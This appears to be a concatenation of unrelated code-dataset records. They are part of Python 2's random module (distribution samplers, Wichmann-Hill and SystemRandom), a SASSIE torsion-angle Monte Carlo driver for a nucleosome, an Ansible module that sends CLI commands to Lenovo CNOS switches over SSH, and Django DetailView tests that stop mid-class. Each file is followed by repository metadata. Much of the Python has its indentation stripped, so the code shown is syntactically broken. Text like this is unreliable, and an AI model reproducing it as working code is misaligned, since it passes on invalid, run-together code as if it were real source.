## -------------------- normal distribution --------------------
def normalvariate(self, mu, sigma):
"""Normal distribution.
mu is the mean, and sigma is the standard deviation.
"""
# mu = mean, sigma = standard deviation
# Uses Kinderman and Monahan method. Reference: Kinderman,
# A.J. and Monahan, J.F., "Computer generation of random
# variables using the ratio of uniform deviates", ACM Trans
# Math Software, 3, (1977), pp257-260.
random = self.random
while 1:
u1 = random()
u2 = 1.0 - random()
z = NV_MAGICCONST*(u1-0.5)/u2
zz = z*z/4.0
if zz <= -_log(u2):
break
return mu + z*sigma
## -------------------- lognormal distribution --------------------
def lognormvariate(self, mu, sigma):
"""Log normal distribution.
If you take the natural logarithm of this distribution, you'll get a
normal distribution with mean mu and standard deviation sigma.
mu can have any value, and sigma must be greater than zero.
"""
return _exp(self.normalvariate(mu, sigma))
## -------------------- exponential distribution --------------------
def expovariate(self, lambd):
"""Exponential distribution.
lambd is 1.0 divided by the desired mean. It should be
nonzero. (The parameter would be called "lambda", but that is
a reserved word in Python.) Returned values range from 0 to
positive infinity if lambd is positive, and from negative
infinity to 0 if lambd is negative.
"""
# lambd: rate lambd = 1/mean
# ('lambda' is a Python reserved word)
# we use 1-random() instead of random() to preclude the
# possibility of taking the log of zero.
return -_log(1.0 - self.random())/lambd
## -------------------- von Mises distribution --------------------
def vonmisesvariate(self, mu, kappa):
"""Circular data distribution.
mu is the mean angle, expressed in radians between 0 and 2*pi, and
kappa is the concentration parameter, which must be greater than or
equal to zero. If kappa is equal to zero, this distribution reduces
to a uniform random angle over the range 0 to 2*pi.
"""
# mu: mean angle (in radians between 0 and 2*pi)
# kappa: concentration parameter kappa (>= 0)
# if kappa = 0 generate uniform random angle
# Based upon an algorithm published in: Fisher, N.I.,
# "Statistical Analysis of Circular Data", Cambridge
# University Press, 1993.
# Thanks to Magnus Kessler for a correction to the
# implementation of step 4.
random = self.random
if kappa <= 1e-6:
return TWOPI * random()
a = 1.0 + _sqrt(1.0 + 4.0 * kappa * kappa)
b = (a - _sqrt(2.0 * a))/(2.0 * kappa)
r = (1.0 + b * b)/(2.0 * b)
while 1:
u1 = random()
z = _cos(_pi * u1)
f = (1.0 + r * z)/(r + z)
c = kappa * (r - f)
u2 = random()
if u2 < c * (2.0 - c) or u2 <= c * _exp(1.0 - c):
break
u3 = random()
if u3 > 0.5:
theta = (mu % TWOPI) + _acos(f)
else:
theta = (mu % TWOPI) - _acos(f)
return theta
## -------------------- gamma distribution --------------------
def gammavariate(self, alpha, beta):
"""Gamma distribution. Not the gamma function!
Conditions on the parameters are alpha > 0 and beta > 0.
The probability distribution function is:
x ** (alpha - 1) * math.exp(-x / beta)
pdf(x) = --------------------------------------
math.gamma(alpha) * beta ** alpha
"""
# alpha > 0, beta > 0, mean is alpha*beta, variance is alpha*beta**2
# Warning: a few older sources define the gamma distribution in terms
# of alpha > -1.0
if alpha <= 0.0 or beta <= 0.0:
raise ValueError, 'gammavariate: alpha and beta must be > 0.0'
random = self.random
if alpha > 1.0:
# Uses R.C.H. Cheng, "The generation of Gamma
# variables with non-integral shape parameters",
# Applied Statistics, (1977), 26, No. 1, p71-74
ainv = _sqrt(2.0 * alpha - 1.0)
bbb = alpha - LOG4
ccc = alpha + ainv
while 1:
u1 = random()
if not 1e-7 < u1 < .9999999:
continue
u2 = 1.0 - random()
v = _log(u1/(1.0-u1))/ainv
x = alpha*_exp(v)
z = u1*u1*u2
r = bbb+ccc*v-x
if r + SG_MAGICCONST - 4.5*z >= 0.0 or r >= _log(z):
return x * beta
elif alpha == 1.0:
# expovariate(1)
u = random()
while u <= 1e-7:
u = random()
return -_log(u) * beta
else: # alpha is between 0 and 1 (exclusive)
# Uses ALGORITHM GS of Statistical Computing - Kennedy & Gentle
while 1:
u = random()
b = (_e + alpha)/_e
p = b*u
if p <= 1.0:
x = p ** (1.0/alpha)
else:
x = -_log((b-p)/alpha)
u1 = random()
if p > 1.0:
if u1 <= x ** (alpha - 1.0):
break
elif u1 <= _exp(-x):
break
return x * beta
## -------------------- Gauss (faster alternative) --------------------
def gauss(self, mu, sigma):
"""Gaussian distribution.
mu is the mean, and sigma is the standard deviation. This is
slightly faster than the normalvariate() function.
Not thread-safe without a lock around calls.
"""
# When x and y are two variables from [0, 1), uniformly
# distributed, then
#
# cos(2*pi*x)*sqrt(-2*log(1-y))
# sin(2*pi*x)*sqrt(-2*log(1-y))
#
# are two *independent* variables with normal distribution
# (mu = 0, sigma = 1).
# (Lambert Meertens)
# (corrected version; bug discovered by Mike Miller, fixed by LM)
# Multithreading note: When two threads call this function
# simultaneously, it is possible that they will receive the
# same return value. The window is very small though. To
# avoid this, you have to use a lock around all calls. (I
# didn't want to slow this down in the serial case by using a
# lock here.)
random = self.random
z = self.gauss_next
self.gauss_next = None
if z is None:
x2pi = random() * TWOPI
g2rad = _sqrt(-2.0 * _log(1.0 - random()))
z = _cos(x2pi) * g2rad
self.gauss_next = _sin(x2pi) * g2rad
return mu + z*sigma
## -------------------- beta --------------------
## See
## http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
## for Ivan Frohne's insightful analysis of why the original implementation:
##
## def betavariate(self, alpha, beta):
## # Discrete Event Simulation in C, pp 87-88.
##
## y = self.expovariate(alpha)
## z = self.expovariate(1.0/beta)
## return z/(y+z)
##
## was dead wrong, and how it probably got that way.
def betavariate(self, alpha, beta):
"""Beta distribution.
Conditions on the parameters are alpha > 0 and beta > 0.
Returned values range between 0 and 1.
"""
# This version due to Janne Sinkkonen, and matches all the std
# texts (e.g., Knuth Vol 2 Ed 3 pg 134 "the beta distribution").
y = self.gammavariate(alpha, 1.)
if y == 0:
return 0.0
else:
return y / (y + self.gammavariate(beta, 1.))
## -------------------- Pareto --------------------
def paretovariate(self, alpha):
"""Pareto distribution. alpha is the shape parameter."""
# Jain, pg. 495
u = 1.0 - self.random()
return 1.0 / pow(u, 1.0/alpha)
## -------------------- Weibull --------------------
def weibullvariate(self, alpha, beta):
"""Weibull distribution.
alpha is the scale parameter and beta is the shape parameter.
"""
# Jain, pg. 499; bug fix courtesy Bill Arms
u = 1.0 - self.random()
return alpha * pow(-_log(u), 1.0/beta)
## -------------------- Wichmann-Hill -------------------
class WichmannHill(Random):
VERSION = 1 # used by getstate/setstate
def seed(self, a=None):
"""Initialize internal state from hashable object.
None or no argument seeds from current time or from an operating
system specific randomness source if available.
If a is not None or an int or long, hash(a) is used instead.
If a is an int or long, a is used directly. Distinct values between
0 and 27814431486575L inclusive are guaranteed to yield distinct
internal states (this guarantee is specific to the default
Wichmann-Hill generator).
"""
if a is None:
try:
a = long(_hexlify(_urandom(16)), 16)
except NotImplementedError:
import time
a = long(time.time() * 256) # use fractional seconds
if not isinstance(a, (int, long)):
a = hash(a)
a, x = divmod(a, 30268)
a, y = divmod(a, 30306)
a, z = divmod(a, 30322)
self._seed = int(x)+1, int(y)+1, int(z)+1
self.gauss_next = None
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
        # Wichmann-Hill random number generator.
#
# Wichmann, B. A. & Hill, I. D. (1982)
# Algorithm AS 183:
# An efficient and portable pseudo-random number generator
# Applied Statistics 31 (1982) 188-190
#
# see also:
# Correction to Algorithm AS 183
# Applied Statistics 33 (1984) 123
#
# McLeod, A. I. (1985)
# A remark on Algorithm AS 183
# Applied Statistics 34 (1985),198-200
# This part is thread-unsafe:
# BEGIN CRITICAL SECTION
x, y, z = self._seed
x = (171 * x) % 30269
y = (172 * y) % 30307
z = (170 * z) % 30323
self._seed = x, y, z
# END CRITICAL SECTION
# Note: on a platform using IEEE-754 double arithmetic, this can
# never return 0.0 (asserted by Tim; proof too long for a comment).
return (x/30269.0 + y/30307.0 + z/30323.0) % 1.0
def getstate(self):
"""Return internal state; can be passed to setstate() later."""
return self.VERSION, self._seed, self.gauss_next
def setstate(self, state):
"""Restore internal state from object returned by getstate()."""
version = state[0]
if version == 1:
version, self._seed, self.gauss_next = state
else:
raise ValueError("state with version %s passed to "
"Random.setstate() of version %s" %
(version, self.VERSION))
def jumpahead(self, n):
"""Act as if n calls to random() were made, but quickly.
n is an int, greater than or equal to 0.
Example use: If you have 2 threads and know that each will
consume no more than a million random numbers, create two Random
objects r1 and r2, then do
r2.setstate(r1.getstate())
r2.jumpahead(1000000)
Then r1 and r2 will use guaranteed-disjoint segments of the full
period.
"""
if not n >= 0:
raise ValueError("n must be >= 0")
x, y, z = self._seed
x = int(x * pow(171, n, 30269)) % 30269
y = int(y * pow(172, n, 30307)) % 30307
z = int(z * pow(170, n, 30323)) % 30323
self._seed = x, y, z
def __whseed(self, x=0, y=0, z=0):
"""Set the Wichmann-Hill seed from (x, y, z).
These must be integers in the range [0, 256).
"""
if not type(x) == type(y) == type(z) == int:
raise TypeError('seeds must be integers')
if not (0 <= x < 256 and 0 <= y < 256 and 0 <= z < 256):
raise ValueError('seeds must be in range(0, 256)')
if 0 == x == y == z:
# Initialize from current time
import time
t = long(time.time() * 256)
t = int((t&0xffffff) ^ (t>>24))
t, x = divmod(t, 256)
t, y = divmod(t, 256)
t, z = divmod(t, 256)
# Zero is a poor seed, so substitute 1
self._seed = (x or 1, y or 1, z or 1)
self.gauss_next = None
def whseed(self, a=None):
"""Seed from hashable object's hash code.
None or no argument seeds from current time. It is not guaranteed
that objects with distinct hash codes lead to distinct internal
states.
This is obsolete, provided for compatibility with the seed routine
used prior to Python 2.1. Use the .seed() method instead.
"""
if a is None:
self.__whseed()
return
a = hash(a)
a, x = divmod(a, 256)
a, y = divmod(a, 256)
a, z = divmod(a, 256)
x = (x + a) % 256 or 1
y = (y + a) % 256 or 1
z = (z + a) % 256 or 1
self.__whseed(x, y, z)
## --------------- Operating System Random Source ------------------
class SystemRandom(Random):
"""Alternate random number generator using sources provided
by the operating system (such as /dev/urandom on Unix or
CryptGenRandom on Windows).
Not available on all systems (see os.urandom() for details).
"""
def random(self):
"""Get the next random number in the range [0.0, 1.0)."""
return (long(_hexlify(_urandom(7)), 16) >> 3) * RECIP_BPF
def getrandbits(self, k):
"""getrandbits(k) -> x. Generates a long int with k random bits."""
if k <= 0:
raise ValueError('number of bits must be greater than zero')
if k != int(k):
raise TypeError('number of bits should be an integer')
bytes = (k + 7) // 8 # bits / 8 and rounded up
x = long(_hexlify(_urandom(bytes)), 16)
return x >> (bytes * 8 - k) # trim excess bits
def _stub(self, *args, **kwds):
"Stub method. Not used for a system random number generator."
return None
seed = jumpahead = _stub
def _notimplemented(self, *args, **kwds):
"Method should not be called for a system random number generator."
raise NotImplementedError('System entropy source does not have state.')
getstate = setstate = _notimplemented
## -------------------- test program --------------------
def _test_generator(n, func, args):
import time
print n, 'times', func.__name__
total = 0.0
sqsum = 0.0
smallest = 1e10
largest = -1e10
t0 = time.time()
for i in range(n):
x = func(*args)
total += x
sqsum = sqsum + x*x
smallest = min(x, smallest)
largest = max(x, largest)
t1 = time.time()
print round(t1-t0, 3), 'sec,',
avg = total/n
stddev = _sqrt(sqsum/n - avg*avg)
print 'avg %g, stddev %g, min %g, max %g' % \
(avg, stddev, smallest, largest)
def _test(N=2000):
_test_generator(N, random, ())
_test_generator(N, normalvariate, (0.0, 1.0))
_test_generator(N, lognormvariate, (0.0, 1.0))
_test_generator(N, vonmisesvariate, (0.0, 1.0))
_test_generator(N, gammavariate, (0.01, 1.0))
_test_generator(N, gammavariate, (0.1, 1.0))
_test_generator(N, gammavariate, (0.1, 2.0))
_test_generator(N, gammavariate, (0.5, 1.0))
_test_generator(N, gammavariate, (0.9, 1.0))
_test_generator(N, gammavariate, (1.0, 1.0))
_test_generator(N, gammavariate, (2.0, 1.0))
_test_generator(N, gammavariate, (20.0, 1.0))
_test_generator(N, gammavariate, (200.0, 1.0))
_test_generator(N, gauss, (0.0, 1.0))
_test_generator(N, betavariate, (3.0, 3.0))
_test_generator(N, triangular, (0.0, 1.0, 1.0/3.0))
# Create one instance, seeded from current time, and export its methods
# as module-level functions. The functions share state across all uses
#(both in the user's code and in the Python libraries), but that's fine
# for most programs and is easier for the casual user than making them
# instantiate their own Random() instance.
_inst = Random()
seed = _inst.seed
random = _inst.random
uniform = _inst.uniform
triangular = _inst.triangular
randint = _inst.randint
choice = _inst.choice
randrange = _inst.randrange
sample = _inst.sample
shuffle = _inst.shuffle
normalvariate = _inst.normalvariate
lognormvariate = _inst.lognormvariate
expovariate = _inst.expovariate
vonmisesvariate = _inst.vonmisesvariate
gammavariate = _inst.gammavariate
gauss = _inst.gauss
betavariate = _inst.betavariate
paretovariate = _inst.paretovariate
weibullvariate = _inst.weibullvariate
getstate = _inst.getstate
setstate = _inst.setstate
jumpahead = _inst.jumpahead
getrandbits = _inst.getrandbits
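# Example usage of the module-level API (illustrative only):
# >>> import random
# >>> random.seed(42)                 # reproducible stream
# >>> random.random()                 # uniform float in [0.0, 1.0)
# >>> random.gauss(0.0, 1.0)          # one draw from a standard normal
# >>> random.sample(xrange(100), 3)   # 3 unique ints drawn from range(100)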
if __name__ == '__main__':
_test()
|
alanjw/GreenOpenERP-Win-X86
|
python/Lib/random.py
|
Python
|
agpl-3.0
| 33,174
|
[
"Gaussian"
] |
830acb521d9c9d616ff4c4a725d9b1283aafe931e537b4e9192b6287cbeb4d9a
|
'''
Driver method to run the monte_carlo module using mixed DNA and protein moves
with several options for a nucleosome core particle (NCP)
$Id: gui_mimic_ncp.py 3037 2016-03-01 19:55:18Z schowell $
'''
import sys
import multiprocessing
import sassie.interface.input_filter as input_filter
import sassie.simulate.torsion_angle_monte_carlo.monte_carlo as monte_carlo
svariables = {}
################################# user input ##################################
################################# user input ##################################
################################# user input ##################################
# input files
pdbfile='../../../developer_files_for_testing/torsion_angle_monte_carlo/c36_w601_ncp_min.pdb'
psffile='../../../developer_files_for_testing/torsion_angle_monte_carlo/c36_w601_ncp.psf'
# output files
dcdfile='w601_ncp.dcd'
# minimization parameters
psf_flag = True  # OpenMM minimization does not work with dsDNA
max_steps = '5000'
energy_convergence = '1.0'
step_size = '0.002'
# setup flexible regions
basis_string_array = []
post_basis_string_array = []
runname = 'run_' + pdbfile[:-4] + '_mixed_MC'
# add the flexible DNA ends
basis_string_array.append(
'(segname DNA1 and resid > 14 and resid < 55) or (segname DNA2 and resid > 299 and resid < 340)'
)
basis_string_array.append(
'(segname DNA1 and resid > 120 and resid < 161) or (segname DNA2 and resid > 193 and resid < 234)'
)
# add the flexible protein tails
basis_string_array.append(
'segname 1H2A and resid < 20 and resid > 1'
)
basis_string_array.append(
'segname 2H2A and resid < 20 and resid > 1'
)
basis_string_array.append(
'segname 1H2B and resid < 27 and resid > 1'
)
basis_string_array.append(
'segname 2H2B and resid < 27 and resid > 1'
)
basis_string_array.append(
'segname 1H3 and resid < 40 and resid > 1'
)
basis_string_array.append(
'segname 2H3 and resid < 40 and resid > 1'
)
basis_string_array.append(
'segname 1H4 and resid < 31 and resid > 1'
)
basis_string_array.append(
'segname 2H4 and resid < 31 and resid > 1'
)
# post region definitions for DNA ends
post_basis_string_array.append(
'(segname DNA1 and resid > 54) or (segname DNA2 and resid < 300) or segname 1H2A or segname 2H2A or segname 1H2B or segname 2H2B or segname 1H3 or segname 2H3 or segname 1H4 or segname 2H4'
)
post_basis_string_array.append(
'(segname DNA1 and resid 161) or (segname DNA2 and resid 193)'
)
# post region definitions for protein tails
post_basis_string_array.append(
'segname 1H2A and resid < 2'
)
post_basis_string_array.append(
'segname 2H2A and resid < 2'
)
post_basis_string_array.append(
'segname 1H2B and resid < 2'
)
post_basis_string_array.append(
'segname 2H2B and resid < 2'
)
post_basis_string_array.append(
'segname 1H3 and resid < 2'
)
post_basis_string_array.append(
'segname 2H3 and resid < 2'
)
post_basis_string_array.append(
'segname 1H4 and resid < 2'
)
post_basis_string_array.append(
'segname 2H4 and resid < 2'
)
rotation_type_array = [
'double_stranded_nucleic_torsion',
'double_stranded_nucleic_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
'protein_backbone_torsion',
]
delta_theta_array = '10.0, 10.0, 30.0, 30.0, 30.0, 30.0, 30.0, 30.0, 30.0, 30.0'
n_flex_regions = len(basis_string_array)
number_of_flexible_regions = str(n_flex_regions)
rotation_direction_array = ['reverse'] * n_flex_regions # irrelevant
# NOTE: the lines below override the per-region delta_theta_array defined
# above, replacing it with a uniform 10.0 degrees for every flexible region
# (one value per region, i.e. n_flex_regions values in total)
dta = delta_theta_array = '10.0'
for i in xrange(n_flex_regions - 1):
    dta += ', ' + delta_theta_array
delta_theta_array = dta
overlap_basis = 'heavy'
temperature = '300.0'
trial_steps = '1000'
goback = '1'
low_rg_cutoff = '0'
high_rg_cutoff = '400.0'
z_flag = False
z_cutoff = '0.0'
constraint_flag = False
constraint_file = 'constraints.txt'
directed_mc = '0'
nonbondflag = '0' # not sure what this is for
seed = '0,123'  # use '1,123' to set the seed, '0,123' to leave it unset
############################### end user input ################################
############################### end user input ################################
############################### end user input ################################
svariables['runname'] = (runname, 'string')
svariables['dcdfile'] = (dcdfile, 'string')
svariables['pdbfile'] = (pdbfile, 'string')
svariables['psffile'] = (psffile, 'string')
svariables['psf_flag'] = (psf_flag, 'string')
svariables['max_steps'] = (max_steps, 'int')
svariables['energy_convergence'] = (energy_convergence, 'float')
svariables['step_size'] = (step_size, 'float')
svariables['number_of_flexible_regions'] = (number_of_flexible_regions, 'int')
svariables['basis_string_array'] = (basis_string_array, 'string')
svariables['delta_theta_array'] = (delta_theta_array, 'float_array')
svariables['rotation_type_array'] = (rotation_type_array, 'string')
svariables['rotation_direction_array'] = (rotation_direction_array, 'string')
svariables['overlap_basis'] = (overlap_basis, 'string')
svariables['post_basis_string_array'] = (post_basis_string_array, 'string')
svariables['temperature'] = (temperature, 'float')
svariables['trial_steps'] = (trial_steps, 'int')
svariables['goback'] = (goback, 'int')
svariables['directed_mc'] = (directed_mc, 'float')
svariables['low_rg_cutoff'] = (low_rg_cutoff, 'float')
svariables['high_rg_cutoff'] = (high_rg_cutoff, 'float')
svariables['z_flag'] = (z_flag, 'boolean')
svariables['z_cutoff'] = (z_cutoff, 'float')
svariables['constraint_flag'] = (constraint_flag, 'boolean')
svariables['constraint_file'] = (constraint_file, 'string')
svariables['nonbondflag'] = (nonbondflag, 'int')
svariables['seed'] = (seed, 'int_array')
error, variables = input_filter.type_check_and_convert(svariables)
assert not error, 'ERROR: %s' % error
txtQueue=multiprocessing.JoinableQueue()
simulation = monte_carlo.simulation()
simulation.main(variables, txtQueue)
this_text = txtQueue.get(True, timeout=0.1)
# perform alignment
try:
import os
import subprocess
import sassie.util.file_utils as file_utils
import sassie.tools.align_driver as align_driver
dcd = os.path.join(runname, 'monte_carlo', dcdfile)
assert os.path.exists(dcd), 'no such file: %s' % dcd
align_basis = (
'((name[i] == "CA") and (segname[i] == "1H2A") and (resid[i] > 105) and (resid[i] < 115))'
)
inputs = align_driver.inputs()
inputs.path = ''
inputs.goal_filter = align_basis
inputs.move_filter = align_basis
inputs.goal = pdbfile
inputs.ref = pdbfile
inputs.move = dcd
inputs.out = dcd.replace('.dcd', '_al.dcd')
file_utils.mkdir_p(os.path.split(inputs.out)[0])
align_driver.align(inputs)
cmd = 'mv %s %s' % (inputs.out, inputs.move)
return_code = subprocess.call(cmd, shell=True)
if return_code:
print 'Failed to move output: %s' % cmd
except Exception:
    print 'Alignment of NCP failed'
|
madscatt/zazzie
|
src_2.7/sassie/simulate/torsion_angle_monte_carlo/gui_mimic_ncp_all_flex.py
|
Python
|
gpl-3.0
| 7,212
|
[
"OpenMM"
] |
a59b37f9eaa4a2e09509ea4737d04d423822c182c7056ea55fd9c7f6a0414fcc
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to send CLI commands to Lenovo Switches
# Lenovo Networking
#
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: cnos_command
author: "Dave Kasberg (@dkasberg)"
short_description: Execute a single command on devices running Lenovo CNOS
description:
- This module allows you to modify the switch running configuration. It provides a way to
execute a single CNOS command on a switch by evaluating the current running configuration
and executing the command only if the specific setting has not been already configured.
The CNOS command is passed as an argument of the method.
This module uses SSH to manage network device configuration.
The results of the operation will be placed in a directory named 'results'
that must be created by the user in their local directory to where the playbook is run.
    For more information about this module from Lenovo and customizing its usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_command.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options:
clicommand:
description:
- This specifies the CLI command as an attribute to this method. The command is
passed using double quotes. The variables can be placed directly on to the CLI
commands or can be invoked from the vars directory.
required: true
default: Null
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_command. These are written in the main.yml file of the tasks directory.
---
- name: Test Command
cnos_command:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
outputfile: "./results/test_command_{{ inventory_hostname }}_output.txt"
clicommand: "display users"
'''
RETURN = '''
return value: |
On successful execution, the method returns a message in JSON format
[Command Applied]
Upon any failure, the method returns an error display string.
'''
import sys
import paramiko
import time
import argparse
import socket
import array
import json
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except ImportError:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
clicommand=dict(required=True),
outputfile=dict(required=True),
host=dict(required=True),
deviceType=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True),),
supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
cliCommand = module.params['clicommand']
deviceType = module.params['deviceType']
outputfile = module.params['outputfile']
hostIP = module.params['host']
output = ""
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
    # Automatically add untrusted hosts (make sure this is acceptable under your security policy)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# Go to config mode
output = output + cnos.waitForDeviceResponse("configure d\n", "(config)#", 2, remote_conn)
    # Send the CLI command
output = output + cnos.waitForDeviceResponse(cliCommand + "\n", "(config)#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
# Logic to check when changes occur or not
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="CLI command executed and results saved in file ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
|
t0mk/ansible
|
lib/ansible/modules/network/lenovo/cnos_command.py
|
Python
|
gpl-3.0
| 5,726
|
[
"VisIt"
] |
70b71b4398223fae652bb892cff07deade4264fb9fabfd467742e2af79e66cfb
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.test import TestCase, override_settings
from django.test.client import RequestFactory
from django.views.generic.base import View
from django.views.generic.detail import SingleObjectTemplateResponseMixin
from django.views.generic.edit import ModelFormMixin
from .models import Artist, Author, Book, Page
@override_settings(ROOT_URLCONF='generic_views.urls')
class DetailViewTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.artist1 = Artist.objects.create(name='Rene Magritte')
cls.author1 = Author.objects.create(name='Roberto Bolaño', slug='roberto-bolano')
cls.author2 = Author.objects.create(name='Scott Rosenberg', slug='scott-rosenberg')
cls.book1 = Book.objects.create(name='2066', slug='2066', pages=800, pubdate=datetime.date(2008, 10, 1))
cls.book1.authors.add(cls.author1)
cls.book2 = Book.objects.create(
name='Dreaming in Code', slug='dreaming-in-code', pages=300, pubdate=datetime.date(2006, 5, 1)
)
cls.page1 = Page.objects.create(
content='I was once bitten by a moose.', template='generic_views/page_template.html'
)
def test_simple_object(self):
res = self.client.get('/detail/obj/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], {'foo': 'bar'})
self.assertIsInstance(res.context['view'], View)
self.assertTemplateUsed(res, 'generic_views/detail.html')
def test_detail_by_pk(self):
res = self.client.get('/detail/author/%s/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_missing_object(self):
res = self.client.get('/detail/author/500/')
self.assertEqual(res.status_code, 404)
def test_detail_object_does_not_exist(self):
self.assertRaises(ObjectDoesNotExist, self.client.get, '/detail/doesnotexist/1/')
def test_detail_by_custom_pk(self):
res = self.client.get('/detail/author/bycustompk/%s/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_slug(self):
res = self.client.get('/detail/author/byslug/scott-rosenberg/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], Author.objects.get(slug='scott-rosenberg'))
self.assertEqual(res.context['author'], Author.objects.get(slug='scott-rosenberg'))
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_custom_slug(self):
res = self.client.get('/detail/author/bycustomslug/scott-rosenberg/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], Author.objects.get(slug='scott-rosenberg'))
self.assertEqual(res.context['author'], Author.objects.get(slug='scott-rosenberg'))
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_pk_ignore_slug(self):
res = self.client.get('/detail/author/bypkignoreslug/%s-roberto-bolano/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_pk_ignore_slug_mismatch(self):
res = self.client.get('/detail/author/bypkignoreslug/%s-scott-rosenberg/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_pk_and_slug(self):
res = self.client.get('/detail/author/bypkandslug/%s-roberto-bolano/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_detail_by_pk_and_slug_mismatch_404(self):
res = self.client.get('/detail/author/bypkandslug/%s-scott-rosenberg/' % self.author1.pk)
self.assertEqual(res.status_code, 404)
def test_verbose_name(self):
res = self.client.get('/detail/artist/%s/' % self.artist1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.artist1)
self.assertEqual(res.context['artist'], self.artist1)
self.assertTemplateUsed(res, 'generic_views/artist_detail.html')
def test_template_name(self):
res = self.client.get('/detail/author/%s/template_name/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/about.html')
def test_template_name_suffix(self):
res = self.client.get('/detail/author/%s/template_name_suffix/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['author'], self.author1)
self.assertTemplateUsed(res, 'generic_views/author_view.html')
def test_template_name_field(self):
res = self.client.get('/detail/page/%s/field/' % self.page1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.page1)
self.assertEqual(res.context['page'], self.page1)
self.assertTemplateUsed(res, 'generic_views/page_template.html')
def test_context_object_name(self):
res = self.client.get('/detail/author/%s/context_object_name/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertEqual(res.context['thingy'], self.author1)
self.assertNotIn('author', res.context)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_duplicated_context_object_name(self):
res = self.client.get('/detail/author/%s/dupe_context_object_name/' % self.author1.pk)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.context['object'], self.author1)
self.assertNotIn('author', res.context)
self.assertTemplateUsed(res, 'generic_views/author_detail.html')
def test_deferred_queryset_template_name(self):
class FormContext(SingleObjectTemplateResponseMixin):
request = RequestFactory().get('/')
model = Author
object = Author.objects.defer('name').get(pk=self.author1.pk)
self.assertEqual(FormContext().get_template_names()[0], 'generic_views/author_detail.html')
def test_deferred_queryset_context_object_name(self):
class FormContext(ModelFormMixin):
request = RequestFactory().get('/')
model = Author
